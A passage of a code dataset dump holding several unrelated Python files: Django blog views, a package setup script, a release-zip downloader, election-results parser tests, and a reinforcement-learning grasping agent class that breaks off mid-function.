id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
1756488 | <filename>posts/views.py
from django.core.paginator import Paginator
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.contrib import messages
from django.http import HttpResponseForbidden
from django.urls import reverse_lazy
from django.contrib.auth.models import User
from .models import Post, Comment
from .forms import CommentForm, UpdateCommentForm
from bootstrap_modal_forms.generic import BSModalUpdateView, BSModalDeleteView
def get_posts(request):
"""
Create a view that will return a list
of posts that were published prior to 'now'
and render them to the 'blogposts.html
"""
post_list = Post.objects.filter(
published_date__lte=timezone.now()).order_by('-published_date')
paginator = Paginator(post_list, 6)
page = request.GET.get('page')
posts = paginator.get_page(page)
context = {
'posts': posts,
'blogs_page': 'active',
'title': 'BLogs'
}
return render(request, "blogposts.html", context)
def post_detail(request, pk):
"""
Create a view that will return a selected
post and associated comments and a comment
from for user to leave comments
"""
post = get_object_or_404(Post, pk=pk)
post.views += 1
post.save()
comments = Comment.objects.order_by('-created_date')
users = User.objects.all().select_related('profiles')
comment = None
# Processing post requests
if request.method == 'POST':
if not request.user.is_authenticated:
return redirect('accounts:login')
comment_form = CommentForm(request.POST)
if comment_form.is_valid():
comment = comment_form.cleaned_data['content']
comment = comment_form.save(commit=False)
comment.post = post
comment.owner = request.user
comment.save()
messages.success(
request,
"Thank you for commenting! Your comment is being reviewed"
)
return redirect('posts:post_detail', pk=post.pk)
else:
comment_form = CommentForm()
context = {
'comments': comments,
'users': users,
'comment_form': comment_form,
'post': post,
'title': 'Blog'
}
return render(request, "postdetail.html", context)
class CommentUpdateView(BSModalUpdateView):
"""
Update comment using django-bootstrap-modal-forms package.
The form_valid method is overdriven to get the correct success_url.
Instance call is used to get the parent post id for the url path,
returning to the the postdetail page after update.
"""
model = Comment
template_name = 'edit_comment.html'
form_class = UpdateCommentForm
def form_valid(self, form):
instance = form.cleaned_data['content']
instance = form.save()
self.success_url = reverse_lazy(
'posts:post_detail',
kwargs={'pk': instance.post.id}
)
return super(CommentUpdateView, self).form_valid(form)
class CommentDeleteView(BSModalDeleteView):
"""
Delete comment using django-bootstrap-modal-forms package.
The get_success_url method is used to get the correct path back
back to the postdetail page after delete. The method calls related
post object to get the correct parent post id.
"""
model = Comment
template_name = 'delete_comment.html'
success_message = 'Success! Comment was delete.'
def get_success_url(self):
post = self.object.post
post_id = self.object.post.id
return reverse_lazy('posts:post_detail', kwargs={'pk': post.id})
| StarcoderdataPython |
1773407 | <gh_stars>0
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="short-chn-yn",
version="0.0.2",
author="cltian",
author_email="<EMAIL>",
description="Short Chinses literal YES or NO recognition by logic",
long_description=long_description,
url="https://github.com/foowaa/short-chn-yn/",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Natural Language :: Chinese (Simplified)",
"Development Status :: 3 - Alpha",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
],
package_data = {
'': ['*.txt', '*.rst'],
},
keywords = "Chinese, NLP"
) | StarcoderdataPython |
67943 | #
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import subprocess
from constants import PLATFORM_PARENT_PATH
from constants import TAP_REPOS_URL
from lib.logger import LOGGER
class ReleaseDownloader:
def __init__(self, app_info):
self.name = app_info['name']
self.snapshot = app_info.get('snapshot')
self.url = app_info.get('url')
self.sources_path = os.path.join(PLATFORM_PARENT_PATH, self.name)
self.zip_name = '{}.zip'.format(app_info.get('zip_name', self.name))
self.logs_directory_path = os.path.join(PLATFORM_PARENT_PATH, 'logs')
if not os.path.exists(self.logs_directory_path):
os.makedirs(self.logs_directory_path)
self.build_log_path = os.path.join(self.logs_directory_path, self.name + '-build.log')
self.err_log_path = os.path.join(self.logs_directory_path, self.name + '-err.log')
def download_release_zip(self, dest_path):
if not self.url:
LOGGER.error('Not specified release url for %s', self.name)
raise 'Not specified release url for {}'.format(self.name)
LOGGER.info('Downloading release package for %s from %s', self.name, self.url)
with open(self.build_log_path, 'a') as build_log, \
open(self.err_log_path, 'a') as err_log:
try:
subprocess.check_call(['wget', '-O', os.path.join(dest_path, '{}.zip'.format(self.name)), self.url], stdout=build_log, stderr=err_log)
except Exception as e:
LOGGER.error('Cannot download release package for %s project', self.name)
raise e
LOGGER.info('Release package has been downloaded for %s project', self.name)
| StarcoderdataPython |
3270788 | import datetime
import unittest
import lxml.etree
from clarify.parser import (Parser, ResultJurisdiction)
class TestParser(unittest.TestCase):
def test__underscore_to_camel(self):
self.assertEqual(Parser._underscore_to_camel(""), "")
self.assertEqual(Parser._underscore_to_camel("test"), "test")
self.assertEqual(Parser._underscore_to_camel("test_again"), "testAgain")
self.assertEqual(Parser._underscore_to_camel("test_again_but_longer"), "testAgainButLonger")
self.assertEqual(Parser._underscore_to_camel("_test_again"), "TestAgain") # XXX: Is this what we expect?
self.assertEqual(Parser._underscore_to_camel("testing_123"), "testing123")
self.assertEqual(Parser._underscore_to_camel("testing_123_again"), "testing123Again")
def test__parse_result_jurisdiction(self):
tag_name = "County"
attributes = {
"name": "Arkansas",
"totalVoters": "10196",
"ballotsCast": "5137",
"voterTurnout": "50.38",
"percentReporting": "100.00",
"precinctsParticipating": "30",
"precinctsReported": "30",
"precinctsReportingPercent": "100.00",
}
result_jurisdiction_element = lxml.etree.Element(tag_name, attributes)
result_jurisdiction = Parser._parse_result_jurisdiction(result_jurisdiction_element)
self.assertIsInstance(result_jurisdiction, ResultJurisdiction)
self.assertTrue(hasattr(result_jurisdiction, "level"))
self.assertTrue(hasattr(result_jurisdiction, "name"))
self.assertTrue(hasattr(result_jurisdiction, "total_voters"))
self.assertTrue(hasattr(result_jurisdiction, "ballots_cast"))
self.assertTrue(hasattr(result_jurisdiction, "voter_turnout"))
self.assertTrue(hasattr(result_jurisdiction, "percent_reporting"))
self.assertTrue(hasattr(result_jurisdiction, "precincts_participating"))
self.assertTrue(hasattr(result_jurisdiction, "precincts_reported"))
self.assertTrue(hasattr(result_jurisdiction, "precincts_reporting_percent"))
self.assertEqual(result_jurisdiction.level, tag_name.lower())
self.assertEqual(result_jurisdiction.name, attributes["name"])
self.assertEqual(result_jurisdiction.total_voters, int(attributes["totalVoters"]))
self.assertEqual(result_jurisdiction.ballots_cast, int(attributes["ballotsCast"]))
self.assertEqual(result_jurisdiction.voter_turnout, float(attributes["voterTurnout"]))
self.assertEqual(result_jurisdiction.percent_reporting, float(attributes["percentReporting"]))
self.assertEqual(result_jurisdiction.precincts_participating, float(attributes["precinctsParticipating"]))
self.assertEqual(result_jurisdiction.precincts_reported, float(attributes["precinctsReported"]))
self.assertEqual(result_jurisdiction.precincts_reporting_percent, float(attributes["precinctsReportingPercent"]))
def test__get_or_create_result_jurisdiction(self):
result_jurisdiction_name = "Test"
result_jurisdiction_element = lxml.etree.Element("County", { "name": result_jurisdiction_name })
result_jurisdiction = Parser._parse_result_jurisdiction(result_jurisdiction_element)
parser = Parser()
self.assertEqual(parser._result_jurisdictions, [])
self.assertEqual(parser._result_jurisdiction_lookup, {})
# Test the "create" part.
parser._get_or_create_result_jurisdiction(result_jurisdiction_element)
self.assertEqual(parser._result_jurisdictions, [ result_jurisdiction ])
self.assertEqual(parser._result_jurisdiction_lookup, { result_jurisdiction_name: result_jurisdiction })
# Test the "get" part.
parser._get_or_create_result_jurisdiction(result_jurisdiction_element)
self.assertEqual(parser._result_jurisdictions, [ result_jurisdiction ])
self.assertEqual(parser._result_jurisdiction_lookup, { result_jurisdiction_name: result_jurisdiction })
def test_add_result_jurisdiction(self):
result_jurisdiction_name = "Test"
result_jurisdiction = ResultJurisdiction(
name=result_jurisdiction_name,
total_voters=0,
ballots_cast=0,
voter_turnout=100.0,
percent_reporting=100.0,
precincts_participating=0,
precincts_reported=0,
precincts_reporting_percent=100.0,
level="county",
)
parser = Parser()
self.assertEqual(parser._result_jurisdictions, [])
self.assertEqual(parser._result_jurisdiction_lookup, {})
parser.add_result_jurisdiction(result_jurisdiction)
self.assertEqual(parser._result_jurisdictions, [ result_jurisdiction ])
self.assertEqual(parser._result_jurisdiction_lookup, { result_jurisdiction_name: result_jurisdiction })
class TestPrecinctParser(unittest.TestCase):
def test_parse(self):
num_precincts = 33
num_candidates = 5
# Overvotes and undervotes
num_pseudo_candidates = 2
num_expected_results = (
num_candidates * (num_precincts + 1) +
num_pseudo_candidates * (num_precincts + 1)
)
er = Parser()
er.parse('tests/data/precinct.xml')
self.assertEqual(er.timestamp.replace(tzinfo=None), datetime.datetime(2014, 5, 20, 20, 19, 21))
self.assertEqual(er.election_name, "2014 Primary Election")
self.assertEqual(er.election_date, datetime.date(2014, 5, 20))
self.assertEqual(er.region, "Greenup")
self.assertEqual(er.total_voters, 28162)
self.assertEqual(er.ballots_cast, 5926)
self.assertEqual(er.voter_turnout, 21.04)
self.assertEqual(len(er.result_jurisdictions), num_precincts)
precinct = next(p for p in er.result_jurisdictions if p.name == 'A105')
self.assertEqual(precinct.total_voters, 0)
self.assertEqual(precinct.ballots_cast, 171)
self.assertEqual(precinct.voter_turnout, 0)
self.assertEqual(precinct.percent_reporting, 4)
self.assertEqual(len(er.contests), 1)
self.assertEqual(len(er.results), num_expected_results)
result_jurisdiction_name = "A105"
result_jurisdiction = er.get_result_jurisdiction(result_jurisdiction_name)
self.assertEqual(str(result_jurisdiction), result_jurisdiction_name)
self.assertEqual(result_jurisdiction.name, result_jurisdiction_name)
self.assertEqual(result_jurisdiction.total_voters, 0)
self.assertEqual(result_jurisdiction.ballots_cast, 171)
self.assertEqual(result_jurisdiction.voter_turnout, 0)
self.assertEqual(result_jurisdiction.percent_reporting, 4)
self.assertEqual(result_jurisdiction, precinct)
contest_text = "US Senator - REPUBLICAN"
contest = er.get_contest(contest_text)
self.assertEqual(str(contest), contest_text)
self.assertEqual(contest.text, contest_text)
self.assertEqual(contest.key, "4")
self.assertEqual(contest.vote_for, 1)
self.assertFalse(contest.is_question)
self.assertEqual(contest.precincts_reporting, 32)
self.assertEqual(contest.precincts_reported, 32)
contest_choice_text = "<NAME>"
contest_choice = contest.choices[0]
self.assertEqual(contest_choice.contest, contest)
self.assertEqual(str(contest_choice), contest_choice_text)
self.assertEqual(contest_choice.text, contest_choice_text)
self.assertEqual(contest_choice.key, "1")
self.assertEqual(contest_choice.total_votes, 820)
class TestCountyParser(unittest.TestCase):
def test_parse(self):
num_counties = 75
num_candidates = 1
# Election
num_vote_types = 4
num_expected_results = (
(num_vote_types * num_counties * num_candidates) +
(num_vote_types * num_candidates)
)
er = Parser()
er.parse('tests/data/county.xml')
self.assertEqual(er.timestamp.replace(tzinfo=None), datetime.datetime(2014, 11, 13, 14, 58, 41))
self.assertEqual(er.election_name, "2014 General Election")
self.assertEqual(er.election_date, datetime.date(2014, 11, 4))
self.assertEqual(er.region, "AR")
self.assertEqual(er.total_voters, 1690577)
self.assertEqual(er.ballots_cast, 850615)
self.assertEqual(er.voter_turnout, 50.32)
self.assertEqual(len(er.result_jurisdictions), num_counties)
county = next(c for c in er.result_jurisdictions if c.name == 'Arkansas')
self.assertEqual(county.total_voters, 10196)
self.assertEqual(county.ballots_cast, 5137)
self.assertEqual(county.voter_turnout, 50.38)
self.assertEqual(county.precincts_participating, 30)
self.assertEqual(county.precincts_reporting_percent, 100.0)
self.assertEqual(len(er.contests), 1)
self.assertEqual(len(er.results), num_expected_results)
result_jurisdiction_name = "Arkansas"
result_jurisdiction = er.get_result_jurisdiction(result_jurisdiction_name)
self.assertEqual(str(result_jurisdiction), result_jurisdiction_name)
self.assertEqual(result_jurisdiction.name, result_jurisdiction_name)
self.assertEqual(result_jurisdiction.total_voters, 10196)
self.assertEqual(result_jurisdiction.ballots_cast, 5137)
self.assertEqual(result_jurisdiction.voter_turnout, 50.38)
self.assertEqual(result_jurisdiction.precincts_participating, 30)
self.assertEqual(result_jurisdiction.precincts_reported, 30)
self.assertEqual(result_jurisdiction.precincts_reporting_percent, 100.0)
self.assertEqual(result_jurisdiction, county)
contest_text = "U.S. Senate"
contest = er.get_contest(contest_text)
self.assertEqual(str(contest), contest_text)
self.assertEqual(contest.text, contest_text)
self.assertEqual(contest.key, "100")
self.assertEqual(contest.vote_for, 1)
self.assertFalse(contest.is_question)
self.assertEqual(contest.counties_participating, 75)
self.assertEqual(contest.counties_reported, 75)
self.assertEqual(contest.precincts_participating, 2655)
self.assertEqual(contest.precincts_reported, 2655)
contest_choice_text = "<NAME>"
contest_choice = contest.choices[0]
self.assertEqual(contest_choice.contest, contest)
self.assertEqual(str(contest_choice), contest_choice_text)
self.assertEqual(contest_choice.text, contest_choice_text)
self.assertEqual(contest_choice.key, "001")
self.assertEqual(contest_choice.party, "REP")
self.assertEqual(contest_choice.total_votes, 477734)
| StarcoderdataPython |
35879 | # --------------------------------------------------------
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
import os
import torch
import torch.nn.functional as F
import numpy as np
from core import networks
from core.utils import *
from core.loss import *
import IPython
import time
class Agent(object):
"""
A general agent class
"""
def __init__(self, num_inputs, action_space, args, name):
for key, val in args.items():
setattr(self, key, val)
self.name = name
self.device = "cuda"
self.update_step = 1
self.init_step = 1
self.action_dim = action_space.shape[0]
self.has_critic = self.name != "BC"
self.action_space = action_space
self.num_inputs = num_inputs + self.num_input_extra
self.traj_feat = None
self.latent_sample = None
self.test_mode = False
self.use_debug_latent = False
self.gaddpg_pred = 0.
if has_check(self, 'traj_goal_mutual_conditioned') :
self.num_inputs += self.policy_traj_latent_size
self.policy, self.policy_optim, self.policy_scheduler, self.policy_target = get_policy_class('GaussianPolicy', self)
def unpack_batch(
self,
state,
point_state=None,
vis=False,
gt_goal=None,
val=False,
grasp_set=None,
vis_image=False,
repeat=False,
traj_latent=None,
separate=True
):
"""
Extract features from point cloud input
"""
if type(point_state) is list or type(point_state) is np.ndarray:
point_state = torch.cuda.FloatTensor(point_state )
if type(state) is list or type(state) is np.ndarray:
state = torch.cuda.FloatTensor(state)
state_feature, network_input = self.state_feature_extractor(
point_state,
feature_2=val,
traj_latent=traj_latent,
train=not self.test_mode)
if len(state_feature) != 2 or type(state_feature) is torch.Tensor: state_feature = [state_feature, None]
return state_feature
def gaddpg_step(self, state, remain_timestep, curr_joint ):
""" use GADDPG to forward pass """
state = select_target_point(state)
gaddpg_remain_step = max(min(remain_timestep + 1, 25), 1)
return self.gaddpg.select_action(state, remain_timestep=gaddpg_remain_step, curr_joint=curr_joint)
@torch.no_grad()
def batch_select_action(
self,
state,
actions=None,
goal_state=None,
vis=False,
remain_timestep=0,
repeat=False,
curr_joint=None,
gt_traj=None,
sample_num=None
):
"""
run policy forward pass in batch simulation
"""
self.set_mode(True)
traj = None
curr_joint_th = torch.cuda.FloatTensor(curr_joint)[:, :7]
img_state = torch.cuda.FloatTensor(state[0][1])
point_state = torch.cuda.FloatTensor(state[0][0])
timestep = remain_timestep
self.timestep = timestep
agent = self
feature, extra = agent.extract_feature( img_state,
point_state,
time_batch=timestep,
goal_batch=goal_state,
vis=vis,
value=False,
train=False,
repeat=repeat,
curr_joint=curr_joint_th )
actions = agent.policy.sample(feature)
action = actions[0].detach().cpu().numpy()
extra_pred = actions[1].detach().cpu().numpy()
action_sample = actions[2].detach().cpu().numpy()
aux_pred = actions[3].detach().cpu().numpy()
return action, traj, extra_pred, aux_pred
@torch.no_grad()
def select_action(
self,
state,
actions=None,
goal_state=None,
vis=False,
remain_timestep=0,
repeat=False,
curr_joint=None,
gt_traj=None,
sample_num=None
):
"""
policy output in test time
"""
self.set_mode(True)
multi_sample = has_check(self, 'multi_traj_sample') and gt_traj is None
if multi_sample and hasattr(self, 'critic') and self.train_traj_sampler and self.critic_mpc:
return self.critic_select_action(state, remain_timestep, curr_joint, vis=vis)
if self.name == 'DQN_HRL' and gt_traj is None and vis:
return self.critic_select_action(state, remain_timestep, curr_joint, vis=vis)
curr_joint_th = torch.Tensor([curr_joint.flatten()]).float().cuda()[:, :7]
img_state = torch.cuda.FloatTensor(state[0][1])[None]
point_state = torch.cuda.FloatTensor(state[0][0])[None]
timestep = torch.cuda.FloatTensor([remain_timestep])
self.timestep = timestep
if has_check(self, 'train_traj_sampler') and gt_traj is None and has_check(self, 'train_traj_feature'):
if multi_sample: # multiple traj samples
traj = self.select_traj(img_state,
point_state.repeat((self.test_traj_num, 1, 1)),
goal_state,
vis=vis,
remain_timestep=remain_timestep,
curr_joint=curr_joint_th.repeat((self.test_traj_num, 1)))
timestep = torch.Tensor([remain_timestep]).float().cuda()
opt_idx = 0
self.traj_feat = self.traj_feat[[opt_idx]]
else:
traj = self.select_traj(img_state, point_state, goal_state,
vis=vis, remain_timestep=remain_timestep,
curr_joint=curr_joint_th )
else:
traj = None
# policy
feature, extra = self.extract_feature( img_state,
point_state,
time_batch=timestep,
goal_batch=goal_state,
value=False,
train=False,
repeat=repeat,
curr_joint=curr_joint_th[:,:7] )
if self.name == 'DQN_HRL' and vis and hasattr(self, 'sampler_traj_feat'):
self.compute_critic_value( img_state, point_state, timestep, curr_joint_th, goal_state)
actions = self.policy.sample(feature)
action = actions[0].detach().cpu().numpy()[0]
extra_pred = actions[1].detach().cpu().numpy()[0]
action_sample = actions[2].detach().cpu().numpy()[0]
aux_pred = actions[3].detach().cpu().numpy()[0]
return action, traj, extra_pred, aux_pred
def update_parameters(self, batch_data, updates, k):
"""
To be inherited
"""
return {}
def compute_loss(self):
"""
compute loss for policy and trajectory embedding
"""
self.policy_grasp_aux_loss = goal_pred_loss(self.aux_pred[self.target_goal_reward_mask, :7], self.target_grasp_batch[self.target_goal_reward_mask, :7] )
self.bc_loss = traj_action_loss(self, self.pi, self.traj_expert_action_batch, self.target_expert_mask)
return sum([getattr(self, name) for name in self.loss_info if name.endswith('loss') and not name.startswith('critic')])
def prepare_data(self, batch_data):
"""
load batch data dictionary and compute extra data
"""
update_step = self.update_step - self.init_step
self.loss_info = list(get_loss_info_dict().keys())
for name in self.loss_info:
setattr(self, name, torch.zeros(1, device=torch.device('cuda')))
for k, v in batch_data.items():
setattr(self, k, torch.cuda.FloatTensor(v))
self.traj_time_batch = self.traj_idx_batch[:, 1, None]
self.cont_traj_inbatch_index = self.traj_idx_batch[:, 0].cuda().long()
self.traj_feat = None
self.reward_mask = (self.return_batch > 0).view(-1)
self.expert_mask = (self.expert_flag_batch >= 1).view(-1)
self.expert_reward_mask = self.reward_mask * (self.expert_flag_batch >= 1).squeeze()
self.perturb_flag_batch = self.perturb_flag_batch.bool()
self.traj_expert_reward_mask = self.expert_reward_mask[self.cont_traj_inbatch_index]
self.train_traj_idx_batch = self.cont_traj_inbatch_index
self.sparsify_sim_traj_time_batch = self.sparsify_sim_traj_idx_batch[:, 1, None]
self.sparsify_sim_cont_traj_inbatch_index = self.sparsify_sim_traj_idx_batch[:, 0].cuda().long()
self.sparsify_sim_traj_expert_reward_mask = self.expert_reward_mask[self.sparsify_sim_cont_traj_inbatch_index]
self.goal_reward_mask = torch.ones_like(self.time_batch).bool()
self.traj_goal_reward_mask = torch.ones_like(self.traj_integer_time_batch).bool()
self.target_grasp_batch = self.traj_goal_batch[:, :7] if self.full_traj_embedding else self.goal_batch[:, :7]
self.target_goal_reward_mask = self.goal_reward_mask[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.goal_reward_mask
self.target_reward_mask = self.reward_mask[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.reward_mask
self.target_return = self.return_batch[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.return_batch
self.target_expert_mask = self.expert_mask[self.cont_traj_inbatch_index] if self.full_traj_embedding else self.expert_mask
self.target_gaddpg_batch = (self.gaddpg_batch * self.reward_mask)
self.target_expert_reward_mask = self.traj_expert_reward_mask if self.full_traj_embedding else self.expert_reward_mask
self.next_time_batch = self.time_batch - 1
self.next_traj_time_batch = self.traj_integer_time_batch - 1
self.target_reward_batch = self.traj_reward_batch if self.full_traj_embedding else self.reward_batch
self.target_mask_batch = self.traj_mask_batch if self.full_traj_embedding else self.mask_batch
def log_stat(self):
"""
log grad and param statistics for tensorboard
"""
self.policy_grad = module_max_gradient(self.policy)
self.feat_grad = module_max_gradient(self.state_feature_extractor.module.encoder)
self.feat_param = module_max_param(self.state_feature_extractor.module.encoder)
self.val_feat_grad = module_max_gradient(self.state_feature_extractor.module.value_encoder)
self.val_feat_param = module_max_param(self.state_feature_extractor.module.value_encoder)
self.policy_param = module_max_param(self.policy)
self.reward_mask_num = self.reward_mask.float().sum()
self.max_traj_sample_len = torch.unique(self.cont_traj_inbatch_index, return_counts=True)[1].max()
self.traj_num = len(self.reward_mask)
self.train_batch_size = len(self.target_expert_reward_mask)
if hasattr(self, 'traj_feature_extractor'):
self.traj_grad = module_max_gradient(self.traj_feature_extractor)
self.traj_param = module_max_param(self.traj_feature_extractor)
if hasattr(self, 'sampler_gaussian'):
self.sampler_mean = self.sampler_gaussian[0].mean().item()
self.sampler_logsigma = self.sampler_gaussian[1].mean().item()
if self.train_traj_sampler and hasattr(self, 'sampler_traj_feat'):
self.traj_sampler_grad = module_max_gradient(self.traj_feature_sampler)
self.traj_sampler_param = module_max_param(self.traj_feature_sampler)
if self.has_critic:
self.value_mean, self.value_mean_2 = self.qf1.mean(), self.qf2.mean()
self.target_mean = self.next_q_value.mean()
self.return_mean = self.traj_return_batch.mean()
self.value_min, self.value_max = self.qf1.min(), self.qf1.max()
self.expert_reward_mask_num = self.expert_reward_mask.sum()
self.goal_reward_mask_num = self.goal_reward_mask.sum()
self.reward_mask_num = self.reward_mask.sum()
self.return_min, self.return_max = self.return_batch.min(), self.return_batch.max()
self.critic_grad = module_max_gradient(self.critic)
self.critic_param = module_max_param(self.critic)
def set_mode(self, test):
"""
set training or test mode for network
"""
self.test_mode = test
if not test:
self.state_feature_extractor.train()
self.policy.train()
if hasattr(self, "critic"):
self.critic.train()
self.critic_optim.zero_grad()
self.state_feat_val_encoder_optim.zero_grad()
if hasattr(self, 'traj_feature_extractor'):
if self.train_traj_feature and not self.fix_traj_feature:
self.traj_feature_extractor.train()
else:
self.traj_feature_extractor.eval()
if self.train_traj_sampler:
self.traj_feature_sampler.train()
else:
torch.no_grad()
self.policy.eval()
self.state_feature_extractor.eval()
if hasattr(self, "critic"): self.critic.eval()
if hasattr(self, "traj_feature_extractor"): self.traj_feature_extractor.eval()
if hasattr(self, "traj_feature_sampler"): self.traj_feature_sampler.eval()
def setup_feature_extractor(self, net_dict, test_time=False):
"""
Load networks
"""
if "traj_feature_extractor" in net_dict:
self.traj_feature_extractor = net_dict["traj_feature_extractor"]["net"]
self.traj_feature_extractor_opt = net_dict["traj_feature_extractor"]["opt"]
self.traj_feature_extractor_sch = net_dict["traj_feature_extractor"]["scheduler"]
else:
self.traj_feature_extractor = net_dict["state_feature_extractor"]["net"]
if 'traj_feature_sampler' in net_dict:
self.traj_feature_sampler = net_dict["traj_feature_sampler"]["net"]
self.traj_feature_sampler_opt = net_dict["traj_feature_sampler"]["opt"]
self.traj_feature_sampler_sch = net_dict["traj_feature_sampler"]["scheduler"]
self.state_feature_extractor = net_dict["state_feature_extractor"]["net"]
self.state_feature_extractor_optim = net_dict["state_feature_extractor"]["opt"]
self.state_feature_extractor_scheduler = net_dict["state_feature_extractor"]["scheduler"]
self.state_feat_encoder_optim = net_dict["state_feature_extractor"][ "encoder_opt" ]
self.state_feat_encoder_scheduler = net_dict["state_feature_extractor"][ "encoder_scheduler" ]
self.state_feat_val_encoder_optim = net_dict["state_feature_extractor"][ "val_encoder_opt" ]
self.state_feat_val_encoder_scheduler = net_dict["state_feature_extractor"][ "val_encoder_scheduler" ]
self.test_time = test_time
def get_mix_ratio(self, update_step):
"""
Get a mixed schedule for supervised learning and RL
"""
idx = int((self.update_step > np.array(self.mix_milestones)).sum())
mix_policy_ratio = get_valid_index(self.mix_policy_ratio_list, idx)
mix_policy_ratio = min(mix_policy_ratio, self.ddpg_coefficients[4])
mix_value_ratio = get_valid_index(self.mix_value_ratio_list, idx)
mix_value_ratio = min(mix_value_ratio, self.ddpg_coefficients[3])
return mix_value_ratio, mix_policy_ratio
def get_lr(self):
"""
Get network learning rates
"""
lrs = {
"policy_lr": self.policy_optim.param_groups[0]["lr"],
"feature_lr": self.state_feature_extractor_optim.param_groups[0]["lr"],
}
if self.train_traj_feature:
lrs["traj_feature_lr"] = self.traj_feature_extractor_opt.param_groups[0]["lr"]
if self.train_traj_sampler:
lrs["traj_sampler_lr"] = self.traj_feature_sampler_opt.param_groups[0]["lr"]
if hasattr(self, 'critic_optim'):
lrs["value_lr"] = self.critic_optim.param_groups[0]["lr"]
lrs["val_feat_lr"] = self.state_feat_val_encoder_optim.param_groups[0]["lr"]
headers = ["network", "learning rate"]
data = [(name, lr) for name, lr in lrs.items()]
return lrs
def optimize(self, loss, update_step):
"""
Backward loss and update optimizer
"""
self.state_feat_encoder_optim.zero_grad()
self.policy_optim.zero_grad()
if self.train_traj_feature:
self.traj_feature_extractor_opt.zero_grad()
if self.train_traj_sampler:
self.traj_feature_sampler_opt.zero_grad()
loss.backward(retain_graph=self.re_sampler_step)
self.policy_optim.step()
if self.train_feature:
self.state_feat_encoder_optim.step()
if self.train_traj_feature:
self.traj_feature_extractor_opt.step()
if self.train_traj_sampler:
self.traj_feature_sampler_opt.step()
def step_scheduler(self, step=None):
"""
Update network scheduler
"""
if self.train_traj_sampler:
self.traj_feature_sampler_sch.step()
if self.train_traj_feature:
self.traj_feature_extractor_sch.step()
if hasattr(self, "critic"):
self.critic_scheduler.step()
if hasattr(self, "policy"):
self.policy_scheduler.step()
if self.train_feature or self.train_value_feature:
self.state_feature_extractor_scheduler.step()
self.state_feat_encoder_scheduler.step()
if self.train_value_feature and hasattr(self, 'state_feat_val_encoder_scheduler'):
self.state_feat_val_encoder_scheduler.step()
def save_model(
self,
step,
output_dir="",
surfix="latest",
actor_path=None,
critic_path=None,
traj_feat_path=None,
state_feat_path=None,
):
"""
save model
"""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
actor_path, critic_path, traj_feat_path, traj_sampler_path, state_feat_path = get_model_path(output_dir,
self.name, self.env_name, surfix)
print("Saving models to {} and {}".format(actor_path, critic_path))
if hasattr(self, "policy"):
torch.save(
{
"net": self.policy.state_dict(),
"opt": self.policy_optim.state_dict(),
"sch": self.policy_scheduler.state_dict(),
},
actor_path,
)
if hasattr(self, "critic"):
torch.save(
{
"net": self.critic.state_dict(),
"opt": self.critic_optim.state_dict(),
"sch": self.critic_scheduler.state_dict(),
},
critic_path,
)
if hasattr(self, 'traj_feature_extractor_opt'):
torch.save(
{
"net": self.traj_feature_extractor.state_dict(),
"opt": self.traj_feature_extractor_opt.state_dict(),
"sch": self.traj_feature_extractor_sch.state_dict(),
},
traj_feat_path,
)
if hasattr(self, 'traj_feature_sampler_opt'):
torch.save(
{
"net": self.traj_feature_sampler.state_dict(),
"opt": self.traj_feature_sampler_opt.state_dict(),
"sch": self.traj_feature_sampler_sch.state_dict(),
},
traj_sampler_path,
)
torch.save(
{
"net": self.state_feature_extractor.state_dict(),
"opt": self.state_feature_extractor_optim.state_dict(),
"encoder_opt": self.state_feat_encoder_optim.state_dict(),
"sch": self.state_feature_extractor_scheduler.state_dict(),
"encoder_sch": self.state_feat_encoder_scheduler.state_dict(),
"val_encoder_opt": self.state_feat_val_encoder_optim.state_dict(),
"val_encoder_sch": self.state_feat_val_encoder_scheduler.state_dict(),
"step": step,
},
state_feat_path,
)
def load_model(
self, output_dir, surfix="latest", set_init_step=False, reinit_value_feat=False
):
"""
Load saved model
"""
actor_path, critic_path, traj_feat_path, traj_sampler_path, state_feat_path = get_model_path(output_dir,
self.name, self.env_name, surfix)
if hasattr(self, "policy") and os.path.exists(actor_path):
net_dict = torch.load(actor_path)
self.policy.load_state_dict(net_dict["net"])
self.policy_optim.load_state_dict(net_dict["opt"])
self.policy_scheduler.load_state_dict(net_dict["sch"])
if self.reinit_optim and set_init_step:
for g in self.policy_optim.param_groups:
g["lr"] = self.reinit_lr
self.policy_scheduler = torch.optim.lr_scheduler.MultiStepLR(
self.policy_optim, milestones=self.policy_milestones, gamma=0.5 )
self.policy_scheduler.initial_lr = self.reinit_lr
self.policy_scheduler.base_lrs[0] = self.reinit_lr
print("reinit policy optim")
print("load policy weight: {:.3f} from {} !!!!".format(module_max_param(self.policy), actor_path))
hard_update(self.policy_target, self.policy, self.tau)
if hasattr(self, "critic") and os.path.exists(critic_path):
net_dict = torch.load(critic_path)
self.critic.load_state_dict(net_dict["net"])
self.critic_optim.load_state_dict(net_dict["opt"])
self.critic_scheduler.load_state_dict(net_dict["sch"])
print("load critic weight: {:.3f} !!!!".format(module_max_param(self.critic)))
hard_update(self.critic_target, self.critic, self.tau)
if hasattr(self, 'traj_feature_extractor') and os.path.exists(traj_feat_path):
net_dict = torch.load(traj_feat_path)
self.traj_feature_extractor.load_state_dict(net_dict["net"], strict=False)
print('load traj feature weight: {:.3f} from {} !!!!'.format(module_max_param(self.traj_feature_extractor), traj_feat_path))
try:
self.traj_feature_extractor_opt.load_state_dict(net_dict["opt"])
self.traj_feature_extractor_sch.load_state_dict(net_dict["sch"])
except:
pass
if hasattr(self, 'train_traj_sampler') and os.path.exists(traj_sampler_path):
net_dict = torch.load(traj_sampler_path)
